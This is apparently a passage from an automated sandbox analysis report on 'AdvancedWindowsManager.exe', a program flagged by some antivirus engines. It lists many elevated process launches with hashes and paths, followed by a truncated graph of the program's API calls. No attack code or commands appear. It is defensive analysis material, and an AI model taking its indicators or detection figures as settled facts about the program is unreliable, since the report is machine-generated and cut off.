                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 54%, ReversingLabs
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                                                        Start time:14:34:02
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                                                        Start time:14:34:02
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                                                        Start time:14:34:02
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:482'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:26F21ED76944ED83382851D9F2453B0E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                                                        Start time:14:34:02
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                                                        Start time:14:34:02
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                                                        Start time:14:34:03
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                                                        Start time:14:34:03
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:4.4%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:17.9%
                                                                                                                                                                                                                                                                          Total number of Nodes:786
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:15
                                                                                                                                                                                                                                                                          execution_graph 21411 10002101 94 API calls std::locale::_Locimp::_Locimp 21375 10001002 44 API calls moneypunct 21377 10017808 65 API calls 7 library calls 21414 1000b110 64 API calls 21509 10009b10 207 API calls 2 library calls 21510 10008710 72 API calls 21415 10015515 RtlEnterCriticalSection RtlLeaveCriticalSection __Deletegloballocale std::_Lockit::_Lockit std::locale::_Init 21512 10023f17 RtlInitializeCriticalSection 21461 1001a61b TlsAlloc 21462 10024219 45 API calls __fassign_l 21380 1001581e InterlockedDecrement RtlDeleteCriticalSection std::_Init_locks::~_Init_locks 21381 1000a020 66 API calls std::locale::_Locimp::_Locimp 21383 1001f421 45 API calls 2 library calls 21419 10001129 53 API calls 21422 1000ad30 66 API calls 2 library calls 21515 1000c330 53 API calls __Getwctype 21426 10003136 100 API calls std::locale::_Locimp::_Locimp 21427 10001ff0 179 API calls std::locale::_Locimp::_Locimp 21467 1000b240 58 API calls 21518 10020b41 58 API calls 4 library calls 21188 1001724e 21189 10017255 21188->21189 21190 1001725a 21188->21190 21202 1001f38d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21189->21202 21194 10017158 21190->21194 21193 1001726b 21195 10017164 _realloc 21194->21195 21199 10017201 _realloc 21195->21199 21200 100171b1 ___DllMainCRTStartup 21195->21200 21203 10016f7f 21195->21203 21197 100171e1 21198 10016f7f __CRT_INIT@12 99 API calls 21197->21198 21197->21199 21198->21199 21199->21193 21200->21197 21200->21199 21201 10016f7f __CRT_INIT@12 99 API calls 21200->21201 21201->21197 21202->21190 21204 10016f92 RtlAllocateHeap 21203->21204 21205 100170a9 21203->21205 21212 10016fb6 GetVersionExA 21204->21212 21220 10016faf 21204->21220 21206 100170e4 21205->21206 21207 100170af 21205->21207 21209 10017142 21206->21209 21210 100170e9 21206->21210 21211 100170ce 21207->21211 21207->21220 21346 1001ae8b 43 API calls _doexit 21207->21346 21209->21220 21353 1001a92f 45 API calls 2 library calls 21209->21353 21213 1001a63f ___set_flsgetvalue 4 API calls 21210->21213 21211->21220 21347 1001ee98 44 API calls ___free_lconv_num 21211->21347 21215 10016fd1 HeapFree 21212->21215 21216 10016fc6 HeapFree 21212->21216 21218 100170ee 21213->21218 21228 10016ffd 21215->21228 21216->21220 21221 10019173 __calloc_crt 43 API calls 21218->21221 21220->21200 21225 100170fa 21221->21225 21222 100170d8 21348 1001a682 44 API calls 2 library calls 21222->21348 21225->21220 21226 10017106 21225->21226 21350 1001a5b8 GetModuleHandleA GetProcAddress 21226->21350 21261 1001d175 HeapCreate 21228->21261 21230 100170dd 21349 1001d1cf VirtualFree HeapDestroy 21230->21349 21232 10017118 21237 10017136 21232->21237 21238 1001711f 21232->21238 21234 10017033 21234->21220 21270 1001a998 GetModuleHandleA 21234->21270 21236 10017041 __RTC_Initialize 21239 10017045 21236->21239 21245 10017054 GetCommandLineA 21236->21245 21352 10016997 43 API calls 2 library calls 21237->21352 21351 1001a6bf 43 API calls 4 library calls 21238->21351 21340 1001d1cf VirtualFree HeapDestroy 21239->21340 21243 10017126 GetCurrentThreadId 21243->21220 21244 10017097 21244->21220 21302 1001f210 21245->21302 21249 1001706e 21250 10017072 21249->21250 21251 10017079 21249->21251 21341 1001a682 44 API calls 2 library calls 21250->21341 21342 1001f157 63 API calls 3 library calls 21251->21342 21254 1001707e 21255 10017092 21254->21255 21343 1001eee4 62 API calls 6 library calls 21254->21343 21255->21244 21345 1001ee98 44 API calls ___free_lconv_num 21255->21345 21258 10017087 21258->21255 21344 1001ad1a 51 API calls 3 library calls 21258->21344 21259 100170a7 21259->21250 21262 1001d195 21261->21262 21263 1001d198 21261->21263 21262->21234 21354 1001d11a 43 API calls 2 library calls 21263->21354 21265 1001d19d 21266 1001d1cb 21265->21266 21355 1001d3ea RtlAllocateHeap 21265->21355 21266->21234 21268 1001d1b1 21268->21266 21269 1001d1b6 HeapDestroy 21268->21269 21269->21262 21271 1001a9aa 21270->21271 21274 1001a9b3 TlsAlloc 21270->21274 21356 1001a682 44 API calls 2 library calls 21271->21356 21273 1001a9af 21273->21236 21276 1001ab17 21274->21276 21277 1001aa4b 21274->21277 21276->21236 21277->21276 21278 1001aa5c 21277->21278 21357 1001ae9a GetModuleHandleA GetProcAddress __init_pointers ___crtMessageBoxA __encode_pointer 21278->21357 21280 1001aa61 21358 1001a54c GetModuleHandleA GetProcAddress 21280->21358 21282 1001aa6c 21359 1001a54c GetModuleHandleA GetProcAddress 21282->21359 21284 1001aa7c 21360 1001a54c GetModuleHandleA GetProcAddress 21284->21360 21286 1001aa8c 21361 1001a54c GetModuleHandleA GetProcAddress 21286->21361 21288 1001aa9c 21362 1001d243 43 API calls ___crtInitCritSecAndSpinCount 21288->21362 21290 1001aaa9 21291 1001ab12 21290->21291 21363 1001a5b8 GetModuleHandleA GetProcAddress 21290->21363 21366 1001a682 44 API calls 2 library calls 21291->21366 21294 1001aabd 21294->21291 21295 10019173 __calloc_crt 43 API calls 21294->21295 21296 1001aad6 21295->21296 21296->21291 21364 1001a5b8 GetModuleHandleA GetProcAddress 21296->21364 21298 1001aaf0 21298->21291 21299 1001aaf7 21298->21299 21365 1001a6bf 43 API calls 4 library calls 21299->21365 21301 1001aaff GetCurrentThreadId 21301->21276 21303 1001f24b 21302->21303 21304 1001f22c 21302->21304 21305 1001f2e6 21303->21305 21310 1001f234 21303->21310 21309 1001f240 GetLastError 21304->21309 21304->21310 21306 1001f2ee GetEnvironmentStrings 21305->21306 21307 10017064 21305->21307 21306->21307 21308 1001f2fe 21306->21308 21323 1001ec58 21307->21323 21369 10019133 43 API calls _malloc 21308->21369 21309->21303 21310->21307 21313 1001f2a9 21310->21313 21314 1001f2db FreeEnvironmentStringsW 21310->21314 21367 10019133 43 API calls _malloc 21313->21367 21314->21307 21315 1001f317 21317 1001f32a 21315->21317 21318 1001f31e FreeEnvironmentStringsA 21315->21318 21319 1001f332 FreeEnvironmentStringsA 21317->21319 21318->21307 21319->21307 21320 1001f2d2 21320->21314 21321 1001f2af 21321->21314 21321->21320 21368 10016997 43 API calls 2 library calls 21321->21368 21370 1001b074 21323->21370 21325 1001ec64 GetStartupInfoA 21326 10019173 __calloc_crt 43 API calls 21325->21326 21328 1001ec85 21326->21328 21327 1001edd6 21330 1001ee0c GetStdHandle 21327->21330 21331 1001ee71 SetHandleCount 21327->21331 21333 1001ee1e GetFileType 21327->21333 21339 1001ee35 21327->21339 21328->21327 21329 1001ee8f _realloc 21328->21329 21332 10019173 __calloc_crt 43 API calls 21328->21332 21334 1001ed59 21328->21334 21329->21249 21330->21327 21331->21329 21332->21328 21333->21327 21334->21327 21335 1001ed82 GetFileType 21334->21335 21336 1001ed8d 21334->21336 21335->21334 21335->21336 21336->21329 21336->21334 21371 10023f27 43 API calls 5 library calls 21336->21371 21339->21327 21339->21329 21372 10023f27 43 API calls 5 library calls 21339->21372 21340->21220 21341->21239 21342->21254 21343->21258 21344->21255 21345->21259 21346->21211 21347->21222 21348->21230 21349->21220 21350->21232 21351->21243 21352->21244 21353->21220 21354->21265 21355->21268 21356->21273 21357->21280 21358->21282 21359->21284 21360->21286 21361->21288 21362->21290 21363->21294 21364->21298 21365->21301 21366->21276 21367->21321 21368->21320 21369->21315 21370->21325 21371->21336 21372->21339 21468 1002424d 56 API calls __forcdecpt_l 21085 10014750 21086 100057a0 53 API calls 21085->21086 21087 100147b8 21086->21087 21088 100057a0 53 API calls 21087->21088 21089 100147db 21088->21089 21090 1000b300 53 API calls 21089->21090 21091 100147e8 21090->21091 21092 10004cc0 53 API calls 21091->21092 21093 100147fb 21092->21093 21094 10014939 InternetCrackUrlW 21093->21094 21095 1001494e 21094->21095 21096 1001498a 21095->21096 21098 10016244 44 API calls 2 library calls 21095->21098 21098->21096 21471 10015a52 45 API calls 2 library calls 21524 1000f358 54 API calls 21432 1000895a 76 API calls 2 library calls 21473 10003e68 97 API calls 2 library calls 20938 10018381 20967 1001a7f6 20938->20967 20940 10015d38 __atodbl_l 5 API calls 20942 10018550 20940->20942 20943 100183f6 21009 1001a1b5 43 API calls @x64toa_s@24 20943->21009 20945 10018406 20948 1001841c 20945->20948 20949 1001840f 20945->20949 20947 1001843c _ProcessCodePage _strlen 20956 100184f0 20947->20956 20972 1001807c 43 API calls 4 library calls 20947->20972 20948->20940 21010 1001610f 10 API calls 3 library calls 20949->21010 20950 1001847f 20950->20948 20973 100217f3 20950->20973 20952 10018419 20952->20948 21014 1001a1b5 43 API calls @x64toa_s@24 20956->21014 20958 100184b5 21012 100211c6 43 API calls @x64toa_s@24 20958->21012 20959 10018528 20959->20948 20960 1001852f 20959->20960 21015 1001610f 10 API calls 3 library calls 20960->21015 20963 100184d8 20963->20956 20964 100184df 20963->20964 21013 1001610f 10 API calls 3 library calls 20964->21013 20966 100184eb 20966->20956 21016 1001a773 GetLastError 20967->21016 20969 1001a7fc 20970 100183b3 20969->20970 21032 1001abfe 43 API calls 3 library calls 20969->21032 20970->20943 20970->20947 20970->20948 20972->20950 20974 1001a7f6 ____lc_codepage_func 43 API calls 20973->20974 20978 100217fc 20974->20978 20975 1002180e GetUserDefaultLCID 21001 10021887 20975->21001 20977 10021839 20979 10021890 20977->20979 20981 10021849 20977->20981 20978->20975 20978->20977 21075 10021279 56 API calls _LangCountryEnumProc@4 20978->21075 20979->20975 20984 1002189a _strlen 20979->20984 20983 1002185a 20981->20983 20986 10021853 20981->20986 21077 100217b7 EnumSystemLocalesA _GetPrimaryLen _strlen 20983->21077 20989 100218a0 EnumSystemLocalesA 20984->20989 21076 10021752 EnumSystemLocalesA _GetPrimaryLen _strlen 20986->21076 20988 10021858 20988->21001 21078 10021279 56 API calls _LangCountryEnumProc@4 20988->21078 20989->21001 20992 10021917 IsValidCodePage 20993 10021929 IsValidLocale 20992->20993 20998 10018494 20992->20998 20993->20998 20999 1002193c 20993->20999 20994 10021871 20995 10021889 20994->20995 20996 10021882 20994->20996 20994->21001 21080 100217b7 EnumSystemLocalesA _GetPrimaryLen _strlen 20995->21080 21079 10021752 EnumSystemLocalesA _GetPrimaryLen _strlen 20996->21079 20998->20948 21011 100181a5 43 API calls 3 library calls 20998->21011 20999->20998 21007 10021991 20999->21007 21081 1001a1b5 43 API calls @x64toa_s@24 20999->21081 21001->20998 21067 100212d9 21001->21067 21003 10021979 21004 10021980 21003->21004 21003->21007 21082 1001610f 10 API calls 3 library calls 21004->21082 21006 1002198c 21006->21007 21007->20998 21083 10018ff8 43 API calls _xtoa_s@20 21007->21083 21009->20945 21010->20952 21011->20958 21012->20963 21013->20966 21014->20959 21015->20952 21033 1001a63f TlsGetValue 21016->21033 21019 1001a7ea SetLastError 21019->20969 21020 1001a796 21020->21019 21038 10019173 21020->21038 21023 1001a7b0 21044 1001a5b8 GetModuleHandleA GetProcAddress 21023->21044 21025 1001a7c2 21026 1001a7e1 21025->21026 21027 1001a7c9 21025->21027 21046 10016997 43 API calls 2 library calls 21026->21046 21045 1001a6bf 43 API calls 4 library calls 21027->21045 21030 1001a7d1 GetCurrentThreadId 21030->21019 21031 1001a7e7 21031->21019 21032->20970 21034 1001a668 TlsGetValue 21033->21034 21035 1001a64f 21033->21035 21034->21020 21047 1001a5b8 GetModuleHandleA GetProcAddress 21035->21047 21037 1001a65a TlsSetValue 21037->21034 21039 10019177 21038->21039 21041 100191b6 21039->21041 21042 10019197 Sleep 21039->21042 21048 10023359 21039->21048 21041->21019 21041->21023 21043 100191ac 21042->21043 21043->21039 21043->21041 21044->21025 21045->21030 21046->21031 21047->21037 21049 10023365 _realloc 21048->21049 21050 1002337d 21049->21050 21060 1002339c _memset 21049->21060 21061 100177c4 43 API calls __getptd_noexit 21050->21061 21052 10023382 21062 1001620b GetModuleHandleA GetProcAddress __invoke_watson __decode_pointer 21052->21062 21054 1002340e RtlAllocateHeap 21054->21060 21055 10023392 _realloc 21055->21039 21060->21054 21060->21055 21063 1001d3b9 43 API calls 2 library calls 21060->21063 21064 1001dc06 5 API calls 2 library calls 21060->21064 21065 10023455 RtlLeaveCriticalSection _doexit 21060->21065 21066 1001b4e2 GetModuleHandleA GetProcAddress __decode_pointer 21060->21066 21061->21052 21063->21060 21064->21060 21065->21060 21066->21060 21074 100212f0 _ProcessCodePage 21067->21074 21068 1002132c GetLocaleInfoA 21069 10021342 21068->21069 21070 10021339 21068->21070 21071 10015d38 __atodbl_l 5 API calls 21069->21071 21084 100266f8 51 API calls _strtol 21070->21084 21073 1002134e 21071->21073 21073->20992 21073->20998 21074->21068 21074->21070 21075->20977 21076->20988 21077->20988 21078->20994 21079->21001 21080->21001 21081->21003 21082->21006 21083->20998 21084->21069 21437 10002700 178 API calls 2 library calls 21393 1001f48d GetModuleHandleA GetProcAddress SetUnhandledExceptionFilter __encode_pointer 21479 10009e90 54 API calls 21480 10015a90 51 API calls __cinit 21481 10021693 58 API calls 5 library calls 21482 10008ea0 80 API calls 21397 1001c8b1 71 API calls 9 library calls 21441 100255ac RtlUnwind 21399 1000a0b0 54 API calls 2 library calls 21400 1000c4b0 73 API calls 21442 1000c5b0 71 API calls 2 library calls 21539 100213bb 57 API calls 4 library calls 21444 1001b5bb 79 API calls 2 library calls 21540 10015fba 45 API calls __XcptFilter 21541 1002bfbd 53 API calls 2 library calls 21542 10009fc0 62 API calls 21491 1001bac4 5 API calls 2 library calls 21543 10023fc4 SetLastError _realloc 21544 100173ce 46 API calls ___InternalCxxFrameHandler 21545 10015fce 53 API calls 10 library calls 21493 10007ed0 43 API calls std::exception::exception 21494 1000d6d0 46 API calls std::ios_base::_Ios_base_dtor 21406 1001b0d0 6 API calls 3 library calls 21451 100021da 95 API calls std::locale::_Locimp::_Locimp 21496 10005adb 45 API calls __CxxThrowException@8 20397 100098e0 20420 100011f0 20397->20420 20401 10009926 20450 100052b0 20401->20450 20403 10009969 20463 100053c0 20403->20463 20405 10009975 20466 100057a0 20405->20466 20407 100099b8 20408 100057a0 53 API calls 20407->20408 20409 100099f6 20408->20409 20410 